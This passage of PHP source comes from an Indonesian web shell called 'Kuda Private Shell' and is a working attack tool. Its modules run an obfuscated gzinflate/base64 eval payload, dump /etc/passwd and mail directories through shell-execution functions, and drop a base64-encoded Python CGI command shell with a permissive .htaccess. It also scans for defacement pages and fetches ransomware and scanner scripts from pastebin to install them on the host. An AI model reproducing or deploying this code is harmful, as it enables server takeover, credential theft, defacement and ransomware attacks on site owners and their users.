                    if(master!=0){document.fCheck.Submit.disabled=false;}else{document.fCheck.Submit.disabled=true;}}/*]]>*/
                  </script>
                  <input onClick="checkValue<?=$bug?>()" name="<?=$bug?>" type="checkbox" id="<?=$bug?>" value="<?=$bug?>" />&nbsp;<?=$bug?><br>
                  <?php
                    }
                    ?>
                  <input name="cekV" type="checkbox" onClick="cekKlik()" id="cekV" value="cekV">
                  <input class="isi" disabled="disabled" name="textV" value="other key word" onFocus="this.select()" type="text" id="textV">
                  <br><br>
                  <input type="hidden" name="asal" value="abcd">
                  <input disabled="disabled" type="submit" name="Submit" value=" S t a r t&nbsp;&nbsp;S c a n " />
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </form>
    <?
    }
    ?>
<?php
}
elseif($_GET['do'] == 'symconfv2') { ?>
<center><h3>Symlink Config v2 By Mr.xBarakuda</h3></center>
<?php
// Cod3d by Mr.xBarakuda //
@error_reporting(0);
@ini_set('html_errors',0);
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('file_uploads',1);
eval(gzinflate(str_rot13(base64_decode('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'))));
}
elseif($_GET['do'] == 'hashgen') {
$submit = $_POST['enter'];
if (isset($submit)) {
$pass = $_POST['password']; // password
$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
$hash = md5($pass); // md5 hash #1
$md4 = hash("md4", $pass);
$hash_md5 = md5($salt . $pass); // md5 hash with salt #2
$hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
$hash1 = sha1($pass); // sha1 hash #4
$sha256 = hash("sha256", $text);
$hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
$hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
}
echo '<form action="" method="post">';
echo '<center><h3>Hash Generator</h3>';
echo '<table>';
echo 'Masukkan teks yang ingin di encrypt: ';
echo '<input class="inputz" type="text" name="password" size="40">';
echo '<input class="inputzbut" type="submit" name="enter" value="Hash!">';
echo '<br>';
echo 'Original Password: <input class=inputz type=text size=50 value='.$pass.'><br><br>';
echo 'MD5: <input class=inputz type=text size=50 value='.$hash.'><br><br>';
echo 'MD4: <input class=inputz type=text size=50 value='.$md4 .'><br><br>';
echo 'MD5 with Salt: <input class=inputz type=text size=50 value='.$hash_md5.'><br><br>';
echo 'MD5 with Salt & Sha1: <input class=inputz type=text size=50 value='.$hash_md5_double.'><br><br>';
echo 'Sha1: <input class=inputz type=text size=50 value='.$hash1 .'><br><br>';
echo 'Sha256: <input class=inputz type=text size=50 value='.$sha256.'><br><br>';
echo 'Sha1 with Salt: <input class=inputz type=text size=50 value='.$hash1_sha1.'><br><br>';
echo 'Sha1 with Salt & MD5: <input class=inputz type=text size=50 value='.$hash1_sha1_double.'></center></table>';
}
elseif($_GET['bypass'] == 'etcpass') {
	echo '<center>Bypass /etc/passwd With:<br>
<table style="width:50%">
  <tr>
    <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
    <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>	
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>		
    <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
</tr></table>Bypass User With:<table style="width:50%">
<tr>
    <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
    <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
    <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>	
    <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>		
    <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
</tr>
</table><br>';

if ($_POST['awkuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
echo "</textarea><br>";
}
if ($_POST['systuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo system("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['passthuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo passthru("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['exuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo exec("ls /var/mail");
echo "</textarea><br>";
}
if ($_POST['shexuser']) {
echo"<textarea class='inputzbut' cols='65' rows='15'>";
echo shell_exec("ls /var/mail");
echo "</textarea><br>";
}
if($_POST['syst'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo system("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['passth'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo passthru("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['ex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
if($_POST['shex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
echo shell_exec("cat /etc/passwd");
echo"</textarea><br><br><b></b><br>";
}
echo '<center>';
if($_POST['melex'])
{
echo"<textarea class='inputz' cols='65' rows='15'>";
for($uid=0;$uid<60000;$uid++){ 
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "
";
}
}
echo"</textarea><br><br>";
}}
elseif($_GET['do'] == 'cgitelnet') {
    echo "<center><h3>Cgi Telnet</h3>";
    echo "<form method='post'><input type='submit' name='cgi' value='CGI PERL'> <input type='submit' name='cgi2' value='CGI PERL 2'> <input type='submit' name='cgipy' value='CGI PYTHON'></form>";
    if(isset($_POST['cgi'])) {
	$cgi_dir = mkdir('kuda_cgi', 0755);
        chdir('kuda_cgi');
	$file_cgi = "cgi.kuda";
        $memeg = ".htaccess";
	$isi_htcgi = "Options Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .kuda
AddHandler cgi-script .kuda
AddHandler cgi-script .kuda";
	$htcgi = fopen(".htaccess", "w");
	$cgi_script = "";
	$cgi = fopen($file_cgi, "w");
	fwrite($cgi, base64_decode($cgi_script));
	fwrite($htcgi, $isi_htcgi);
	chmod($file_cgi, 0755);
        chmod($memeg, 0755);
	echo "<center>Done <a href='kuda_cgi/cgi.kuda' target='_blank'><font color='lime'>Click Here</a></font>";
}
if(isset($_POST['cgi2'])) {
	$cgi_dir = mkdir('kuda_cgi', 0755);
        chdir('kuda_cgi');
	$file_cgi = "cgi2.kuda";
        $memeg = ".htaccess";
	$isi_htcgi = "Options Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .kuda
AddHandler cgi-script .kuda
AddHandler cgi-script .kuda";
	$htcgi = fopen(".htaccess", "w");
	$cgi_script = "";
	$cgi = fopen($file_cgi, "w");
	fwrite($cgi, base64_decode($cgi_script));
	fwrite($htcgi, $isi_htcgi);
	chmod($file_cgi, 0755);
    chmod($memeg, 0755);
	echo "<center>Done <a href='kuda_cgi/cgi2.kuda' target='_blank'><font color='lime'>Click Here</a></font>";
} if(isset($_POST['cgipy'])) {
	$cgi_dir = mkdir('kuda_cgi', 0755);
    chdir('kuda_cgi');
	$file_cgi = "cgipy.kuda";
    $memeg = ".htaccess";
	$isi_htcgi = "Options Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .kuda
AddHandler cgi-script .kuda
AddHandler cgi-script .kuda";
	$htcgi = fopen(".htaccess", "w");
	$cgi_script = "IyEvdXNyL2Jpbi9weXRob24NCiMgMDctMDctMDQNCiMgdjEuMC4wDQoNCiMgY2dpLXNoZWxsLnB5DQojIEEgc2ltcGxlIENHSSB0aGF0IGV4ZWN1dGVzIGFyYml0cmFyeSBzaGVsbCBjb21tYW5kcy4NCg0KDQojIENvcHlyaWdodCBNaWNoYWVsIEZvb3JkDQojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQgcmVsaWNlbnNlIHRoaXMgY29kZS4NCg0KIyBObyB3YXJyYW50eSBleHByZXNzIG9yIGltcGxpZWQgZm9yIHRoZSBhY2N1cmFjeSwgZml0bmVzcyB0byBwdXJwb3NlIG9yIG90aGVyd2lzZSBmb3IgdGhpcyBjb2RlLi4uLg0KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISENCg0KIyBFLW1haWwgbWljaGFlbCBBVCBmb29yZCBET1QgbWUgRE9UIHVrDQojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsvYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbA0KDQoiIiINCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8gZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLg0KIiIiDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojIEltcG9ydHMNCnRyeToNCiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpDQpleGNlcHQ6DQogICAgcGFzcw0KaW1wb3J0IHN5cywgY2dpLCBvcw0Kc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQNCmZyb20gdGltZSBpbXBvcnQgc3RyZnRpbWUNCmltcG9ydCB0cmFjZWJhY2sNCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPDQpmcm9tIHRyYWNlYmFjayBpbXBvcnQgcHJpbnRfZXhjDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgY29uc3RhbnRzDQoNCmZvbnRsaW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQtc2l6ZToxMnB0OyI+Jw0KdmVyc2lvbnN0cmluZyA9ICdWZXJzaW9uIDEuMC4wIDd0aCBKdWx5IDIwMDQnDQoNCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToNCiAgICBzY3JpcHRuYW1lID0gb3MuZW52aXJvblsiU0NSSVBUX05BTUUiXQ0KZWxzZToNCiAgICBzY3JpcHRuYW1lID0gIiINCg0KTUVUSE9EID0gJyJQT1NUIicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBQcml2YXRlIGZ1bmN0aW9ucyBhbmQgdmFyaWFibGVzDQoNCmRlZiBnZXRmb3JtKHZhbHVlbGlzdCwgdGhlZm9ybSwgbm90cHJlc2VudD0nJyk6DQogICAgIiIiVGhpcyBmdW5jdGlvbiwgZ2l2ZW4gYSBDR0kgZm9ybSwgZXh0cmFjdHMgdGhlIGRhdGEgZnJvbSBpdCwgYmFzZWQgb24NCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFsdWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLg0KICAgIChlLmcuIHRvIHJldHVybiBOb25lIHNvIHlvdSBjYW4gdGVzdCBmb3IgbWlzc2luZyBrZXl3b3JkcyAtIHdoZXJlICcnIGlzIGEgdmFsaWQgYW5zd2VyIGJ1dCB0byBoYXZlIHRoZSBmaWVsZCBtaXNzaW5nIGlzbid0LikiIiINCiAgICBkYXRhID0ge30NCiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0Og0KICAgICAgICBpZiBub3QgdGhlZm9ybS5oYXNfa2V5KGZpZWxkKToNCiAgICAgICAgICAgIGRhdGFbZmllbGRdID0gbm90cHJlc2VudA0KICAgICAgICBlbHNlOg0KICAgICAgICAgICAgaWYgIHR5cGUodGhlZm9ybVtmaWVsZF0pICE9IHR5cGUoW10pOg0KICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdGhlZm9ybVtmaWVsZF0udmFsdWUNCiAgICAgICAgICAgIGVsc2U6DQogICAgICAgICAgICAgICAgdmFsdWVzID0gbWFwKGxhbWJkYSB4OiB4LnZhbHVlLCB0aGVmb3JtW2ZpZWxkXSkgICAgICMgYWxsb3dzIGZvciBsaXN0IHR5cGUgdmFsdWVzDQogICAgICAgICAgICAgICAgZGF0YVtmaWVsZF0gPSB2YWx1ZXMNCiAgICByZXR1cm4gZGF0YQ0KDQoNCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1zaGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+DQo8Qk9EWT48Q0VOVEVSPg0KPEgxPldlbGNvbWUgdG8gY2dpLXNoZWxsLnB5IC0gPEJSPmEgUHl0aG9uIENHSTwvSDE+DQo8Qj48ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPg0KIiIiK2ZvbnRsaW5lICsiVmVyc2lvbiA6ICIgKyB2ZXJzaW9uc3RyaW5nICsgIiIiLCBSdW5uaW5nIG9uIDogIiIiICsgc3RyZnRpbWUoJyVJOiVNICVwLCAlQSAlZCAlQiwgJVknKSsnLjwvQ0VOVEVSPjxCUj4nDQoNCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIgQ29tbWFuZDwvSDI+DQo8Rk9STSBNRVRIT0Q9XCIiIiIgKyBNRVRIT0QgKyAnIiBhY3Rpb249IicgKyBzY3JpcHRuYW1lICsgIiIiXCI+DQo8aW5wdXQgbmFtZT1jbWQgdHlwZT10ZXh0PjxCUj4NCjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+DQo8L0ZPUk0+PEJSPjxCUj4iIiINCmJvZHllbmQgPSAnPC9CT0RZPjwvSFRNTD4nDQplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBtYWluIGJvZHkgb2YgdGhlIHNjcmlwdA0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIHByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyDQogICAgcHJpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMgc28gaXMgdGhpcyBibGFuayBsaW5lDQogICAgZm9ybSA9IGNnaS5GaWVsZFN0b3JhZ2UoKQ0KICAgIGRhdGEgPSBnZXRmb3JtKFsnY21kJ10sZm9ybSkNCiAgICB0aGVjbWQgPSBkYXRhWydjbWQnXQ0KICAgIHByaW50IHRoZWZvcm1oZWFkDQogICAgcHJpbnQgdGhlZm9ybQ0KICAgIGlmIHRoZWNtZDoNCiAgICAgICAgcHJpbnQgJzxIUj48QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJSPicNCiAgICAgICAgcHJpbnQgJ1Jlc3VsdCA6IDxCUj48QlI+Jw0KICAgICAgICB0cnk6DQogICAgICAgICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZGluLmNsb3NlKCkNCiAgICAgICAgICAgIHJlc3VsdCA9IGNoaWxkX3N0ZG91dC5yZWFkKCkNCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpDQogICAgICAgICAgICBwcmludCByZXN1bHQucmVwbGFjZSgnXG4nLCAnPEJSPicpDQoNCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlvbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNvbW1hbmQNCiAgICAgICAgICAgIHByaW50IGVycm9ybWVzcw0KICAgICAgICAgICAgZiA9IFN0cmluZ0lPKCkNCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpDQogICAgICAgICAgICBhID0gZi5nZXR2YWx1ZSgpLnNwbGl0bGluZXMoKQ0KICAgICAgICAgICAgZm9yIGxpbmUgaW4gYToNCiAgICAgICAgICAgICAgICBwcmludCBsaW5lDQoNCiAgICBwcmludCBib2R5ZW5kDQoNCg0KIiIiDQpUT0RPL0lTU1VFUw0KDQoNCg0KQ0hBTkdFTE9HDQoNCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wDQpBIHZlcnkgYmFzaWMgc3lzdGVtIGZvciBleGVjdXRpbmcgc2hlbGwgY29tbWFuZHMuDQpJIG1heSBleHBhbmQgaXQgaW50byBhIHByb3BlciAnZW52aXJvbm1lbnQnIHdpdGggc2Vzc2lvbiBwZXJzaXN0ZW5jZS4uLg0KIiIi";
	$cgi = fopen($file_cgi, "w");
	fwrite($cgi, base64_decode($cgi_script));
	fwrite($htcgi, $isi_htcgi);
	chmod($file_cgi, 0755);
    chmod($memeg, 0755);
	echo "<center>Done <a href='kuda_cgi/cgipy.kuda' target='_blank'><font color='lime'>Click Here</a></font>";
}
echo "</center>";
echo "</center>";
echo "</center>";
echo "</center>";
}
elseif($_GET['do'] == 'fake_root') {
    ob_start();
    $cwd = getcwd();
    $ambil_user = explode("/", $cwd);
    $user = $ambil_user[2];
    if($_POST['reverse']) {
        $site = explode("
", $_POST['url']);
        $file = $_POST['file'];
        foreach($site as $url) {
            $cek = getsource("$url/~$user/$file");
            if(preg_match("/hacked/i", $cek)) {
                echo "<center>URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font></center><br>";
            }
        }
    } else {
        echo "<center><form method='post'>
        Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
        User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
        Domain: <br>
        <textarea style='width: 450px; height: 250px;' name='url'>";
        reverse($_SERVER['HTTP_HOST']);
        echo "</textarea><br>
        <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
        </form><br>
        NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
    }
}
elseif($_GET['do'] == 'about') {
    ?>
  <tr>
    <td>
      <center>
        <h3 style='color: cyan;'>Kuda Private Shell Recoded From All Indonesian Web Shell</h3>
        <p style='color: white;'>GreetZ:</p>
        <font color="cyan">[</font>
        <marquee direction="left" scrollamount="10" style="width: 50%;">All Member From BabbyCyberTeam - IndoXploit - All Indonesian Pentester</marquee>
        <font color="cyan">]</font>
        <p>Gue gans, thanks:)</p>
      </center>
    </td>
  </tr>
<?php
}
elseif($_GET['do'] == 'contact') {
	echo "<center><h3>Contact Orang Gans</h3>
	<table><td style='background-color: transparent; text-align: center; border: 2px aqua dotted; width:300px; height:60px;'>
	<font color='cyan'>Email: [email protected]<br>Instagram: <a href='https://instagram.com/x_barakuda' target='_blank'>x_barakuda</a></font></tr></td></table></center>";
}
elseif($_GET['do'] == 'adminer') {
    $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
    function adminer($url, $isi) {
        $fp = fopen($isi, "w");
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL, $url);
              curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_FILE, $fp);
        return curl_exec($ch);
              curl_close($ch);
        fclose($fp);
        ob_flush();
        flush();
    }
    if(file_exists('adminer.php')) {
        echo "<center><a href='$full/adminer.php' target='_blank'><font color='lime'>> ADMINER LOGIN <</a></font></center>";
    } else {
        if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
            echo "<center><a href='$full/adminer.php' target='_blank'><font color='lime'>> ADMINER LOGIN <</a></font></center>";
        } else {
            echo "<center><font color='red'>gagal buat file adminer</font></center>";
        }
    }
}
elseif($_GET['do'] == 'ransomware') {
    $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
    function explo($url, $isi) {
        $fp = fopen($isi, "w");
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL, $url);
              curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_FILE, $fp);
        return curl_exec($ch);
              curl_close($ch);
        fclose($fp);
        ob_flush();
        flush();
    }
    if(file_exists('ransom.php')) {
        echo "<center><a href='$full/ransom.php' target='_blank'><font color='lime'>> RANSOMWARE <</a></font></center>";
    } else {
        if(explo("https://pastebin.com/raw/r9AQzCqX","ransom.php")) {
            echo "<center><a href='$full/ransom.php' target='_blank'><font color='lime'>> RANSOMWARE <</a></font></center>";
        } else {
            echo "<center><font color='red'>gagal buat file ransomware</font></center>";
        }
    }
}
elseif($_GET['do'] == 'kudascan') {
    $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
    function tod($url, $isi) {
        $fp = fopen($isi, "w");
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL, $url);
              curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_FILE, $fp);
        return curl_exec($ch);
              curl_close($ch);
        fclose($fp);
        ob_flush();
        flush();
    }
    if(file_exists('kudascan.php')) {
        echo "<center><a href='$full/kudascan.php' target='_blank'><font color='lime'>> SCANNER SHELL <</a></font></center>";
    } else {
        if(tod("https://pastebin.com/raw/F0QPqWnn","kudascan.php")) {
            echo "<center><a href='$full/kudascan.php' target='_blank'><font color='lime'>> SCANNER SHELL <</a></font></center>";
        } else {
            echo "<center><font color='red'>gagal buat file scanner</font></center>";
        }
    }
}
elseif($_GET['do'] == 'wp_timthumb') {
    $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
    function kentod($url, $isi) {
        $fp = fopen($isi, "w");
        $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL, $url);
              curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
              curl_setopt($ch, CURLOPT_FILE, $fp);
        return curl_exec($ch);
              curl_close($ch);
        fclose($fp);
        ob_flush();
        flush();
    }
    if(file_exists('wp-timthumb.php')) {
        echo "<center><a href='$full/wp-timthumb.php' target='_blank'><font color='lime'>> WP-TIMTHUMB <</a></font></center>";
    } else {
        if(kentod("https://pastebin.com/raw/Fn4X835C","wp-timthumb.php")) {
            echo "<center><a href='$full/wp-timthumb.php' target='_blank'><font color='lime'>> WP-TIMTHUMB <</a></font></center>";
        } else {
            echo "<center><font color='red'>gagal buat file timthumb</font></center>";
        }
    }
}
elseif($_GET['do'] == 'auto_dwp') {
    if($_POST['auto_deface_wp']) {
        function anucurl($sites) {
            $ch = curl_init($sites);
                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
